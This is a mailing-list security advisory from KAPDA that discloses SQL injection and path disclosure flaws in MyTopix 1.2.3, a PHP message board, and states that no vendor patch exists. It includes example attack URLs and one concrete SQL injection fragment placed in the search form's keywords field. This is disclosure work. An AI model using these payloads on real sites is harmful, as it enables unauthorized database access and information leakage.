<<< Date Index >>>     <<< Thread Index >>>

[KAPDA::#26] - MyTopix Sql Injection & Path Disclosure



KAPDA New advisory

Vendor: http://www.jaia-interactive.com
Vulnerable: Version: 1.2.3
Bug: Sql Injection & Path Disclosure
Exploitation: Remote with browser

Description:
--------------------
MyTopix is a PHP-based message board system that uses
a MySQL database.
 
Vulnerability:
--------------------
-Sql Injection :
The software does not properly validate user-supplied
input in 'search.php'. A remote user can create
specially crafted parameter values that will execute
SQL commands on the underlying database. 

HTTP Method: GET
http://example.com/mytopix/index.php?a=search&CODE=02&mid=[SQL]

HTTP Method: POST
method="post"
action="http://example.com/mytopix/index.php?a=search&CODE=01";
name="keywords" value="kapda') AS topics_score FROM
my_posts p LEFT JOIN my_topics  t ON t.topics_id  =
p.posts_topic/*"

--------------------
-Path Disclosure:
There is no restriction to access the includes files
directly.A remote user can supply a specially crafted
URL to cause the system to display an error message
that discloses the installation path.
http://example.com/mytopix/modules/logon.mod.php 
+ another Path Disclosure bug in highlight mode:
http://example.com/mytopix/index.php?gettopic=10&hl=kapda')

Solution:
--------------------
There is no vendor supplied patch for this issue at
this time.
 
Original Advisories:
--------------------
http://kapda.ir/advisory-249.html
IN Farsi:
http://irannetjob.com/content/view/195/28/

Credit :
--------------------
Discovered & released by trueend5 (trueend5 kapda ir)
Security Science Researchers Institute Of Iran
[http://www.KAPDA.ir]

__________________________________________________
Do You Yahoo!?
Tired of spam?  Yahoo! Mail has the best spam protection around 
http://mail.yahoo.com